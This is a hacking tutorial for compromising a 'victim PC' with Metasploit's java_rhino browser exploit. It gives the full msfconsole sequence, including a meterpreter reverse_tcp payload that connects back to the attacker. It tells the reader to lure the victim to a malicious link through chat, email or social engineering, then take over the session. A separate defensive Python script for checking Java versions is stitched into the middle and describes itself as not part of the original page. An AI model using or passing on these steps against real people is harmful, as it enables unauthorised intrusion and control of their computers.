How to Hack Remote Victim PC with Java Applet Rhino Script

This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc.).

Exploit Targets

Operating System: Windows XP, Apple OSX, Linux x86

Java Version: JDK and JRE 7, 6 Update 27 and before Java JSE 6 Update 26
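
A defender-side check for the affected versions stated above, added here as an example and not part of the original page: it parses java -version banners and flags hosts that fall in the stated range. The function names and the sample inventory are constructed for illustration; it assumes "version 7" means Java 7 with no update applied, and reports releases other than 6 and 7 as unknown.

```python
import re

# Matches the legacy "1.<major>.<minor>_<update>" string printed by `java -version`.
_BANNER = re.compile(r'version "1\.(\d+)\.\d+(?:_(\d+))?[^"]*"')


def parse_banner(banner):
    """Return (major, update) from a `java -version` banner, or None."""
    m = _BANNER.search(banner)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2) or 0)


def classify(banner):
    """Classify a banner against the ranges stated on this page.

    Assumption: "version 7" means Java 7 with no update applied.
    Releases other than 6 and 7 are outside the page's statement, so they
    are reported as "unknown" instead of being guessed.
    """
    parsed = parse_banner(banner)
    if parsed is None:
        return "unknown"
    major, update = parsed
    if major == 6:
        return "affected" if update <= 27 else "not-affected"
    if major == 7:
        return "affected" if update == 0 else "not-affected"
    return "unknown"


def affected_hosts(inventory):
    """Return the sorted host names whose banner classifies as affected."""
    return sorted(h for h, b in inventory.items() if classify(b) == "affected")


# Constructed sample inventory (host names and banners are illustrative).
SAMPLE_INVENTORY = {
    "ws-01": 'java version "1.6.0_26"\nJava(TM) SE Runtime Environment (build 1.6.0_26-b03)',
    "ws-02": 'java version "1.6.0_29"',
    "ws-03": 'java version "1.7.0"',
    "ws-04": 'java version "1.7.0_01"',
    "ws-05": 'openjdk version "17.0.2" 2022-01-18',
}

if __name__ == "__main__":
    for host, banner in sorted(SAMPLE_INVENTORY.items()):
        print(host, classify(banner))
```

Hosts reported as unknown need a manual check against the vendor's advisory, since the page only states the Java 6 and 7 ranges.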


Attacker: BackTrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/java_rhino

Msf exploit (java_rhino)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_rhino)>set srvhost (This must be an address on the local machine)

Msf exploit (java_rhino)>set lhost (IP of Local Host)

Msf exploit (java_rhino)>set target 1 (Operating system of Victim PC)

Msf exploit (java_rhino)>set uripath javarhino (The Url to use for this exploit)

Msf exploit (java_rhino)>exploit

Now you have a URL that you should give to your victim.

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” and the session number to connect to the session. Now type “sessions -i ID”.

